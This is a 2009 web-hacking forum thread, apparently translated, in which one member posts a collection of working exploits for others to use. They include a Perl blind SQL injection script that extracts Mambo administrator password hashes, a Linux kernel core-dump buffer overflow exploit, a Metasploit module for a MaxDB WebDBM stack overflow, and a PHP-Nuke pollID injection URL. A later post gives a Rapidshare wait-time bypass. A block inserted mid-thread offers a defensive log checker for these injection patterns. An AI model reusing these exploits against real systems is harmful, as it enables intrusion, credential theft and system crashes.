Collection of Bugs

Forum for discussing everything about web hacking, from footprinting, scanning, gaining access, escalating privileges, exploitation, covering tracks and backdoors, through to securing the web.

Moderators: Paman, Xshadow, indounderground, NeOS-01

Forum rules
Discussing bugs, penetration, exploitation and techniques for securing websites and web servers. Include a POC here so that members can study it.
Digital Cat
Posts: 437
Joined: Fri Jun 26, 2009 6:13 pm
Location: USA

Re: Collection of Bugs

Post by Digital Cat » Fri Jul 24, 2009 7:03 pm

Mambo "user_rating" Parameter Remote SQL Injection Exploit

Advisory : FrSIRT/ADV-2005-0777
Rated as : Moderate Risk

Code:

#!/usr/bin/perl
use IO::Socket;

if ( @ARGV < 3) { &usage; }

$server = $ARGV[0];
$path = $ARGV[1];
$member_id = $ARGV[2];

# parameters of any existing news item
$news_id = 1;
$news_itemid = 1;

$server =~ s!(http:\/\/)!!;

$request = 'http://';
$request .= $server;
$request .= $path;

$s_num = 1;
$|++;
$n = 0;
&head;
print "\r\n";
print " [~] SERVER : $server\r\n";
print " [~] PATH : $path\r\n";
print " [~] USER ID : $member_id\r\n";
print " [~] SEARCHING PASSWORD ... [|]";

while(1)
{
if(&found(47,58)==0) { &found(96,103); }
$char = $i;
if ($char=="0")
{
if(length($allchar) > 0){
print qq{\b\b DONE ]
---------------------------------------------------------------
USER ID : $member_id
HASH : $allchar
---------------------------------------------------------------
};
}
else
{
print "\b\b FAILED ]";
}
exit();
}
else
{
$allchar .= chr($char);
}
$s_num++;
}

sub found($$)
{
my $fmin = $_[0];
my $fmax = $_[1];
if (($fmax-$fmin)<5) { $i=crack($fmin,$fmax); return $i; }

$r = int($fmax - ($fmax-$fmin)/2);
$check = "/**/BETWEEN/**/$r/**/AND/**/$fmax";
if ( &check($check) ) { &found($r,$fmax); }
else { &found($fmin,$r); }
}

sub crack($$)
{
my $cmin = $_[0];
my $cmax = $_[1];
$i = $cmin;
while ($i<$cmax)
{
$crcheck = "=$i";
if ( &check($crcheck) ) { return $i; }
$i++;
}
$i = 0;
return $i;
}

sub check($)
{
$n++;
status();
$ccheck = $_[0];
$sock1 = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$server", PeerPort => "80");
printf $sock1 ("GET %sindex.php?option=com_content&task=vote&id=%d&Itemid=%d&cid=1&user_rating=1,rating_count=(SELECT/**/if((ascii(substring((SELECT/**/password/**/FROM/**/mos_users/**/WHERE/**/id=%d),%d,1)))%s,1145711457,0)),lastip=666/* HTTP/1.0\nHost: %s\nAccept: */*\nConnection: close\n\n",
$path,$news_id,$news_itemid,$member_id,$s_num,$ccheck,$server);
# pause between requests so the data has time to update; play with this
# value if the exploit reports FAILED
sleep 1;
$sock2 = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$server", PeerPort => "80");
printf $sock2 ("GET %sindex.php?option=com_content&task=view&id=%d&Itemid=%d&cid=1 HTTP/1.0\nHost: %s\nAccept: */*\nConnection: close\n\n",
$path,$news_id,$news_itemid,$server);

while(<$sock2>)
{
if (/1145711457/) { return 1; }
}

return 0;
}

sub status()
{
$status = $n % 5;
if($status==0){ print "\b\b/]"; }
if($status==1){ print "\b\b-]"; }
if($status==2){ print "\b\b\\]"; }
if($status==3){ print "\b\b|]"; }
}

sub usage()
{
&head;
print q(
USAGE
r57mambo.pl [HOST] [/FOLDER/] [USER_ID]

OPTIONS
HOST - Host where mambo installed
FOLDER - Folder where mambo installed
USER_ID - User ID for brute (default is 62 for admin)
);
exit();
}
sub head()
{
print q(
---------------------------------------------------------------
Mambo <= 4.5.2.1, MySQL => 4.1 sql injection exploit by digital cat
---------------------------------------------------------------
);
}
Thank you.......

Digital Cat
Posts: 437
Joined: Fri Jun 26, 2009 6:13 pm
Location: USA

Re: Collection of Bugs

Post by Digital Cat » Fri Jul 24, 2009 7:06 pm

Linux Kernel "binfmt_elf" Core Dump Local Buffer Overflow Exploit

Advisory : FrSIRT/ADV-2005-0524
Rated as : Moderate Risk

Code:

#!/bin/bash
#
# elfcd.sh
# warning: This code will crash your machine
#
cat <<__EOF__>elfcd1.c
/*
* Linux binfmt_elf core dump buffer overflow
*
* Copyright (c) 2005 iSEC Security Research. All Rights Reserved.
*
* THIS PROGRAM IS FOR EDUCATIONAL PURPOSES *ONLY* IT IS PROVIDED "AS IS"
* AND WITHOUT ANY WARRANTY. COPYING, PRINTING, DISTRIBUTION, MODIFICATION
* WITHOUT PERMISSION OF THE AUTHOR IS STRICTLY PROHIBITED.
*
*/
// phase 1
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <errno.h>
#include <unistd.h>

#include <sys/time.h>
#include <sys/resource.h>

#include <asm/page.h>


static char *env[10], *argv[4];
static char page[PAGE_SIZE];
static char buf[PAGE_SIZE];


void fatal(const char *msg)
{
if(!errno) {
fprintf(stderr, "\nFATAL: %s\n", msg);
}
else {
printf("\n");
perror(msg);
}
fflush(stdout); fflush(stderr);
_exit(129);
}


int main(int ac, char **av)
{
int esp, i, r;
struct rlimit rl;

__asm__("movl %%esp, %0" : : "m"(esp));
printf("\n[*] %s argv_start=%p argv_end=%p ESP: 0x%x", av[0], av[0],
av[ac-1]+strlen(av[ac-1]), esp);
rl.rlim_cur = RLIM_INFINITY;
rl.rlim_max = RLIM_INFINITY;
r = setrlimit(RLIMIT_CORE, &rl);
if(r) fatal("setrlimit");

memset(env, 0, sizeof(env) );
memset(argv, 0, sizeof(argv) );
memset(page, 'A', sizeof(page) );
page[PAGE_SIZE-1]=0;

// move up env & exec phase 2
if(!strcmp(av[0], "AAAA")) {
printf("\n[*] phase 2, <RET> to crash "); fflush(stdout);

argv[0] = "elfcd2";
argv[1] = page;

// term 0 counts!
memset(buf, 0, sizeof(buf) );
for(i=0; i<789 + 4; i++)
buf[i] = 'C';
argv[2] = buf;
execve(argv[0], argv, env);
_exit(127);
}

// move down env & reexec
for(i=0; i<9; i++)
env[i] = page;

argv[0] = "AAAA";
printf("\n[*] phase 1"); fflush(stdout);

execve(av[0], argv, env);

return 0;
}
__EOF__
cat <<__EOF__>elfcd2.c
// phase 2
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <syscall.h>

#include <sys/syscall.h>

#include <asm/page.h>

#define __NR_sys_read __NR_read
#define __NR_sys_kill __NR_kill
#define __NR_sys_getpid __NR_getpid


char stack[4096 * 6];
static int errno;


inline _syscall3(int, sys_read, int, a, void*, b, int, l);
inline _syscall2(int, sys_kill, int, c, int, a);
inline _syscall0(int, sys_getpid);


// yeah, lets do it
void killme()
{
char c='a';
int pid;

pid = sys_getpid();
for(;;) {
sys_read(0, &c, 1);
sys_kill(pid, 11);
}
}


// safe stack stub
__asm__(
" nop \n"
"_start: movl \$0xbfff6ffc, %esp \n"
" jmp killme \n"
".global _start \n"
);
__EOF__
cat <<__EOF__>elfcd.ld
OUTPUT_FORMAT("elf32-i386", "elf32-i386",
"elf32-i386")
OUTPUT_ARCH(i386)
ENTRY(_start)
SEARCH_DIR(/lib); SEARCH_DIR(/usr/lib); SEARCH_DIR(/usr/local/lib);
SEARCH_DIR(/usr/i486-suse-linux/lib);

MEMORY
{
ram (rwxali) : ORIGIN = 0xbfff0000, LENGTH = 0x8000
rom (x) : ORIGIN = 0xbfff8000, LENGTH = 0x10000
}

PHDRS
{
headers PT_PHDR PHDRS ;
text PT_LOAD FILEHDR PHDRS ;
fuckme PT_LOAD AT (0xbfff8000) FLAGS (0x00) ;
}

SECTIONS
{

.dupa 0xbfff8000 : AT (0xbfff8000) { LONG(0xdeadbeef); _bstart = . ; . += 0x7000; }
>rom :fuckme

. = 0xbfff0000 + SIZEOF_HEADERS;
.text : { *(.text) } >ram :text
.data : { *(.data) } >ram :text
.bss :
{
*(.dynbss)
*(.bss)
*(.bss.*)
*(.gnu.linkonce.b.*)
*(COMMON)
. = ALIGN(32 / 8);
} >ram :text

}
__EOF__

# compile & run
echo -n "[*] Compiling..."

gcc -O2 -Wall elfcd1.c -o elfcd1
gcc -O2 -nostdlib elfcd2.c -o elfcd2 -Xlinker -T elfcd.ld -static
./elfcd1
Thank you.......

Digital Cat
Posts: 437
Joined: Fri Jun 26, 2009 6:13 pm
Location: USA

Re: Collection of Bugs

Post by Digital Cat » Fri Jul 24, 2009 7:08 pm

MySQL MaxDB Webtool "GET" Command Remote Buffer Overflow Exploit
Date : 11/05/2005

Advisory : FrSIRT/ADV-2005-0389
CVE Reference : CAN-2005-0684
Rated as : High Risk

Code:

package Msf::Exploit::maxdb_webdbm_get_overflow;
use base "Msf::Exploit";
use strict;
use Pex::Text;

my $advanced = { };

my $info =
{
'Name' => 'MaxDB WebDBM GET Buffer Overflow',
'Version' => '$Revision: 1.1 $',
'Authors' => [ 'H D Moore <hdm [at] metasploit.com>' ],
'Arch' => [ 'x86' ],
'OS' => [ 'win32', 'win2000', 'winxp', 'win2003'],
'Priv' => 1,

'UserOpts' =>
{
'RHOST' => [1, 'ADDR', 'The target address'],
'RPORT' => [1, 'PORT', 'The target port', 9999],
},

'Payload' =>
{
'Space' => 2052,
'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c\x40",
'Prepend' => "\x81\xc4\x54\xf2\xff\xff", # add esp, -3500
'Keys' => ['+ws2ord'],
},

'Description' => Pex::Text::Freeform(qq{
This module exploits a stack overflow in the MaxDB WebDBM service.
This service is included with many recent versions of the MaxDB and SAPDB
products. This particular module is capable of exploiting Windows systems
through the use of an SEH frame overwrite. The offset to the SEH frame
may change depending on where MaxDB has been installed, this module assumes
a web root path with the same length as:

C:\\Program Files\\sdb\\programs\\web\\Documents
}),

'Refs' =>
[
['URL', 'http://www.idefense.com/application/poi/display?id=234&type=vulnerabilities'],
],

'DefaultTarget' => 0,
'Targets' =>
[
['MaxDB 7.5.00.11 / 7.5.00.24', 0x1002aa19 ], # wapi.dll
['Windows 2000 English', 0x75022ac4 ], # ws2help.dll
['Windows XP English SP0/SP1', 0x71aa32ad ], # ws2help.dll
['Windows 2003 English', 0x7ffc0638 ], # peb magic :-)
['Windows NT 4.0 SP4/SP5/SP6', 0x77681799 ], # ws2help.dll
],

'Keys' => ['maxdb'],
};

sub new {
my $class = shift;
my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced},  @_);
return($self);
}

sub Check {
my $self = shift;
my $target_host = $self->GetVar('RHOST');
my $target_port = $self->GetVar('RPORT');

my $s = Msf::Socket::Tcp->new(
'PeerAddr' => $target_host,
'PeerPort' => $target_port,
'LocalPort' => $self->GetVar('CPORT'),
'SSL' => $self->GetVar('SSL'),
);

if ( $s->IsError ) {
$self->PrintLine( '[*] Error creating socket: ' . $s->GetError );

return $self->CheckCode('Connect');
}

$s->Send("HEAD / HTTP/1.0\r\n\r\n");
my $res = $s->Recv(-1, 5);
$s->Close;

if ($res =~ m/Server:\s*(SAP-Internet-SapDb-Server.*)$/m) {
my $banner = $1;
$banner =~ s/\r//g;

$self->PrintLine("[*] WebDBM detected: $banner");

return $self->CheckCode('Detected');
}

$self->PrintLine("[*] SAP/MaxDB WebDBM server was not detected");

return $self->CheckCode('Safe');
}


sub Exploit {
my $self = shift;
my $target_host = $self->GetVar('RHOST');
my $target_port = $self->GetVar('RPORT');
my $target_idx = $self->GetVar('TARGET');
my $shellcode = $self->GetVar('EncodedPayload')->Payload;
my $target = $self->Targets->[$target_idx];

$self->PrintLine( "[*] Attempting to exploit " . $target->[0] );


my $s = Msf::Socket::Tcp->new(
'PeerAddr' => $target_host,
'PeerPort' => $target_port,
'LocalPort' => $self->GetVar('CPORT'),
'SSL' => $self->GetVar('SSL'),
);

if ( $s->IsError ) {
$self->PrintLine( '[*] Error creating socket: ' . $s->GetError );

return;
}

# Trigger the SEH by writing past the end of the page after
# the SEH is already overwritten. This avoids the other smashed
# pointer exceptions and goes straight to the payload.
my $path = Pex::Text::AlphaNumText(16384);

substr($path, 1586, length($shellcode), $shellcode);
substr($path, 3638, 5, "\xe9" . pack('V', -2052));
substr($path, 3643, 2, "\xeb\xf9");
substr($path, 3647, 4, pack('V', $target->[1]));

$s->Send("GET /%$path HTTP/1.0\r\n\r\n");
$s->Recv(-1, 5);
return;
}

1;
Thank you.......

Digital Cat
Posts: 437
Joined: Fri Jun 26, 2009 6:13 pm
Location: USA

Re: Collection of Bugs

Post by Digital Cat » Fri Jul 24, 2009 7:12 pm

Bug : SQL phpnuke 7.0

Code by : [email protected]

Code:

The vulnerability was found in the Survey module. A remote attacker can inject arbitrary
SQL code by exploiting the lack of filtering of the pollID variable.
This vulnerability can be used to obtain the password hashes of the portal's users.
o-------------------------=[ Example ]:::
www.victim.com/php-nuke/modules.php?name=Surveys&pollID=a'[sql_code_here]
Thank you.......

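A log-side check for the two injection patterns in this thread (the Mambo com_content vote `user_rating` parameter and the PHP-Nuke Surveys `pollID` parameter), plus a size rule that would flag an oversized request target of the kind the WebDBM module above sends. This is an added example written for this page, not code from any of the posted exploits or their authors; the log lines are constructed, and the 1-5 rating range and the 4096-byte limit are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Request line of an Apache-style access log entry (constructed format, see SAMPLE_LOG).
REQ_RE = re.compile(r'"(?:GET|POST) (?P<target>\S+) HTTP/1\.[01]"')
MAX_TARGET_LEN = 4096  # assumption: anything longer is treated as suspicious

def check_request(target):
    """Return a list of findings for one request target; empty means nothing flagged."""
    findings = []
    if len(target) > MAX_TARGET_LEN:
        findings.append("oversized request target (%d bytes)" % len(target))
    qs = parse_qs(urlsplit(target).query, keep_blank_values=True)
    # Mambo vote handler: user_rating should be one digit 1-5 (assumed range); the
    # posted exploit smuggles ",rating_count=(SELECT ...)" into this value.
    if qs.get("option") == ["com_content"] and qs.get("task") == ["vote"]:
        for value in qs.get("user_rating", []):
            if not re.fullmatch(r"[1-5]", value):
                findings.append("non-numeric user_rating: %s" % value[:60])
    # PHP-Nuke Surveys module: pollID is a row id and must be purely numeric.
    if qs.get("name") == ["Surveys"]:
        for value in qs.get("pollID", []):
            if not value.isdigit():
                findings.append("non-numeric pollID: %s" % value[:60])
    return findings

def scan_log(lines):
    """Map log lines to (client_ip, finding) tuples; lines without a request line are skipped."""
    hits = []
    for line in lines:
        match = REQ_RE.search(line)
        if not match:
            continue
        client_ip = line.split()[0]
        for finding in check_request(match.group("target")):
            hits.append((client_ip, finding))
    return hits

# Constructed sample log lines: one benign and one injected request per application,
# plus an oversized request target.
SAMPLE_LOG = [
    '10.0.0.5 - - [24/Jul/2009:19:03:00 +0700] "GET /mambo/index.php?option=com_content'
    '&task=vote&id=1&Itemid=1&cid=1&user_rating=4 HTTP/1.0" 200 512',
    '10.0.0.9 - - [24/Jul/2009:19:03:02 +0700] "GET /mambo/index.php?option=com_content'
    '&task=vote&id=1&Itemid=1&cid=1&user_rating=1,rating_count=(SELECT/**/1) HTTP/1.0" 200 512',
    '10.0.0.7 - - [24/Jul/2009:19:12:00 +0700] "GET /php-nuke/modules.php?name=Surveys&pollID=3 HTTP/1.1" 200 2048',
    '10.0.0.9 - - [24/Jul/2009:19:12:05 +0700] "GET /php-nuke/modules.php?name=Surveys&pollID=a%27 HTTP/1.1" 200 2048',
    '10.0.0.3 - - [24/Jul/2009:19:15:00 +0700] "GET /%' + "A" * 5000 + ' HTTP/1.0" 414 0',
]
```

Running `scan_log(SAMPLE_LOG)` flags only the second, fourth and fifth constructed lines, each with the client address and the rule that matched.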
pLaybOy
Posts: 26
Joined: Sun Dec 30, 2007 12:24 am

Re: Collection of Bugs

Post by pLaybOy » Sat Jul 25, 2009 4:17 am

Awesome, but I don't dare open the CIA one, later they'll think it was me who hacked it :lol:

d1kz
Posts: 107
Joined: Fri Jul 24, 2009 3:50 pm
Location: B4t4v14
Contact:

Re: Collection of Bugs

Post by d1kz » Sat Jul 25, 2009 2:25 pm

Crazy, there are a lot of them :D :D :D
::. Always follow your heart .::

Digital Cat
Posts: 437
Joined: Fri Jun 26, 2009 6:13 pm
Location: USA

Re: Collection of Bugs

Post by Digital Cat » Sat Jul 25, 2009 3:15 pm

pLaybOy wrote: Awesome, but I don't dare open the CIA one, later they'll think it was me who hacked it :lol:
Why don't you dare open it..?

Just open it / take a look again..

Do you want to see your name at the CIA?

Just kidding...

Thank you.......

Digital Cat
Posts: 437
Joined: Fri Jun 26, 2009 6:13 pm
Location: USA

Re: Collection of Bugs

Post by Digital Cat » Mon Nov 16, 2009 2:09 pm

For those who often download from Rapidshare, it is surely tedious to have to wait your turn to download,

just use this code, saved in .bat format:

Code:

ipconfig /flushdns
ipconfig /release
ipconfig /renew
exit


the JavaScript is like this:

Code:

c(countdown = 0);
sorry mate if someone already knew this.. ok..

thanks..

shad.hckr
Posts: 555
Joined: Mon Sep 29, 2008 4:48 am
Location: /home/sh4dhckr

Re: Collection of Bugs

Post by shad.hckr » Mon Nov 16, 2009 6:02 pm

the CIA bug doesn't seem to work anymore, bro.. but the posts are great.. absolutely top-notch..
